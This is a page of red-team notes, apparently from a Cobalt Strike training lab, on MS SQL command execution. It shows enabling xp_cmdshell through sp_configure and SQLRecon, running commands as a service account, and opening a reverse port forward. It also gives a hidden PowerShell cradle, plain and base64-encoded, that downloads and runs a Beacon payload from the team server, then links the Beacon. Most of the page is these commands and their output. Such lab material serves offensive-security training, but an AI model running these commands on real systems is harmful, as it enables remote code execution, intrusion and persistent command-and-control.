What is this changing
Notes
NotesSome other stuff
test
Notes
NotesSome other stuff
  • Mixing...
  • General
    • Transferring Files
      • Serving Your Files
      • Transferring Files To Linux
      • Transferring Files To Windows
    • File Types
      • .vhd
    • Password Cracking
      • Hashcat
        • Wordlists
        • Wordlist + Rules
        • Masks
        • Mask Files
        • Combinator
        • Hybrid
        • Keyboard Walks
    • Trash to sift through
      • Cookie 3.1.24.ctd
  • OSINT
  • Enumeration
  • Web Applications
    • Web Vulnerabilities
      • Web App Red Team Checklist
      • SSRF (Server Side Request Forgery)
      • Blind Data Exfiltration via DNS
      • XSS
      • XXE
      • XPath Injection
    • APIs
      • Web API Indicators
      • Passive Reconnaissance
      • Active API Reconnaissance
  • Active Directory
    • Reconnaissance
      • PowerView
      • SharpView
      • ADSearch
    • User Impersonation
      • Pass the Hash
      • Pass the Ticket
      • Overpass the Hash
      • Token Impersonation
      • Token Store
      • Make Token
      • Process Injection
    • Lateral Movement
      • Windows Remote Management
      • PsExec
      • Windows Management Instrumentation (WMI)
      • CoInitializeSecurity
      • DCOM
    • Kerberos
      • Kerberoasting
      • ASREP Roasting
      • Unconstrained Delegation
      • Constrained Delegation
      • Alternate Service Name
      • S4U2Self Abuse
      • Resource-Based Constrained Delegation
      • Shadow Credentials
      • Kerberos Relay Attacks
    • Pivoting
      • SOCKS Proxies
      • Linux Tools For Proxies
      • Windows Tools For Proxies
      • Pivoting with Kerberos
      • Pivoting A Browser
      • Reverse Port Forwards
      • NTLM Relaying
      • Relaying WebDAV
    • AD Certificate Services
      • Find Certificate Authorities
      • Misconfigured Certificate Templates
      • NTLM Relaying to ADCS HTTP Endpoints
      • User & Computer Persistence
    • Group Policy
      • Modify Existing GPO
      • Create & Link a GPO
    • MS SQL Servers
      • MS SQL Impersonation
      • MS SQL Command Execution
      • MS SQL Lateral Movement
      • MS SQL Privilege Escalation
    • Configuration Manager
      • Enumeration
      • Network Access Account Credentials
      • Lateral Movement
    • Domain Dominance
      • Silver Tickets
      • Golden Ticket
      • Diamond Tickets
      • Forged Certificates
    • Forest & Domain Trusts
      • Parent/Child
      • One-Way Inbound
      • One-Way Outbound
    • LAPS (Local Administrator Password Solution)
      • Reading ms-Mcs-AdmPwd
      • Password Expiration Protection
      • LAPS Backdoors
  • Report Writing
    • Wireless Pentesting
  • Cobalt Strike
    • Starting
      • Start CS as a Service
      • Listener Management
      • Generating Payloads
      • Pivot Listeners
    • Take Screenshot
    • Mimikatz
      • NTLM Hashes
      • Kerberos Encryption Keys
      • Security Account Manager
      • Domain Cached Credentials
    • Extracting Kerberos Tickets
    • DCSync
    • Session Passing
      • Beacon Passing
      • Foreign Listener
      • Spawn & Inject
    • Credentials
      • Credential Manager
      • Scheduled Task Credentials
    • Evading Windows Defender
      • Artifact Kit
      • Malleable C2
      • Resource Kit
      • AMSI vs Post-Exploitation
      • Manual AMSI Bypasses
      • Behavioural Detections
      • Parent/Child Relationships
      • Command Line Detections
    • Application Whitelisting
      • Policy Enumeration
      • Writeable Paths
      • Binaries, Scripts, and Libraries
      • PowerShell CLM
      • Beacon DLL
Powered by GitBook
On this page
Edit on GitHub

Last updated 5 days ago

The xp_cmdshell procedure can be used to execute shell commands on the SQL server if you have sysadmin privileges. Invoke-SQLOSCmd from PowerUpSQL provides a simple means of using it.

The same will fail if you try manually in Heidi or mssqlclient, because xp_cmdshell is disabled.

To enumerate the current state of xp_cmdshell, use:

A value of 0 shows that xp_cmdshell is disabled. To enable it:

Query sys.configurations again and the xp_cmdshell value should be 1; and xp_cmdshell will also now work.

OPSEC If you're going to make this type of configuration change to a target, you must ensure you set it back to its original value afterwards. The reason this works with Invoke-SQLOSCmd is because it will automatically attempt to enable xp_cmdshell if it's not already, execute the given command, and then disable it again. This is a good example of why you should study your tools before you use them, so you know what is happening under the hood.

SQLRecon also has a module for interacting with the xp_cmdshell configuration, which can also be combined with the impersonation module.

With command execution, we can work towards executing a Beacon payload. As with other servers in the lab, the SQL servers cannot talk directly to our team server in order to download a hosted payload. Instead, we must setup a reverse port forward to tunnel that traffic through our C2 chain.

Next, host smb_x64.ps1 at /b on the team server. We know SMB will work because we can validate that port 445 is open on the target SQL server.

We can now download and execute the payload, for example:

OR

Keep an eye on your web log so you know when the payload has been fetched.

You can then link to the Beacon.

What payload would you use if port 445 was closed? Experiment with using the pivot listener here instead of SMB.

sp_configure 'Show Advanced Options', 1; RECONFIGURE;
sp_configure 'xp_cmdshell', 1; RECONFIGURE;
execute-assembly C:\Tools\SQLRecon\SQLRecon\bin\Release\SQLRecon.exe /a:wintoken /h:sql-2.dev.cyberbotic.io,1433 /m:ienablexp /i:DEV\mssql_svc

[*] Enabling xp_cmdshell as 'DEV\mssql_svc' on sql-2.dev.cyberbotic.io,1433
[+] SUCCESS: Enabled xp_cmdshell on sql-2.dev.cyberbotic.io,1433.
name | value | 
---------------
xp_cmdshell | 1 |

beacon> execute-assembly C:\Tools\SQLRecon\SQLRecon\bin\Release\SQLRecon.exe /a:wintoken /h:sql-2.dev.cyberbotic.io,1433 /m:ixpcmd /i:DEV\mssql_svc /c:ipconfig

[*] Executing 'ipconfig' as 'DEV\mssql_svc' on sql-2.dev.cyberbotic.io,1433.
output | 
---------
 | 
Windows IP Configuration | 
 | 
 | 
Ethernet adapter Ethernet: | 
 | 
   Connection-specific DNS Suffix  . : ec2.internal | 
   IPv4 Address. . . . . . . . . . . : 10.10.122.25 | 
   Subnet Mask . . . . . . . . . . . : 255.255.254.0 | 
   Default Gateway . . . . . . . . . : 10.10.122.1 | 
 |
beacon> run hostname
wkstn-2

beacon> getuid
[*] You are DEV\bfarmer (admin)

beacon> powershell New-NetFirewallRule -DisplayName "8080-In" -Direction Inbound -Protocol TCP -Action Allow -LocalPort 8080

beacon> rportfwd 8080 127.0.0.1 80
[+] started reverse port forward on 8080 to 127.0.0.1:80
beacon> portscan 10.10.122.25 445
(ICMP) Target '10.10.122.25' is alive. [read 8 bytes]
10.10.122.25:445 (platform: 500 version: 10.0 name: SQL-2 domain: DEV)
Scanner module is complete
powershell -w hidden -c "iex (new-object net.webclient).downloadstring('http://wkstn-2:8080/b')"
powershell -w hidden -enc aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBrAHMAdABuAC0AMgA6ADgAMAA4ADAALwBiACcAKQA=
01/05 15:09:07 visit (port 80) from: 127.0.0.1
	Request: GET /b
	page Serves /home/attacker/cobaltstrike/uploads/smb_x64.ps1
	null
beacon> link sql-2.dev.cyberbotic.io TSVCPIPE-ae2b7dc0-4ebe-4975-b8a0-06e990a41337
[+] established link to child beacon: 10.10.122.25
PreviousMS SQL ImpersonationNextMS SQL Lateral Movement
  1. Active Directory
  2. MS SQL Servers

MS SQL Command Execution

beacon> powershell Invoke-SQLOSCmd -Instance "sql-2.dev.cyberbotic.io,1433" -Command "whoami" -RawResults

dev\mssql_svc
SQL> EXEC xp_cmdshell 'whoami';
[-] ERROR(SQL-2): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server.
SELECT value FROM sys.configurations WHERE name = 'xp_cmdshell';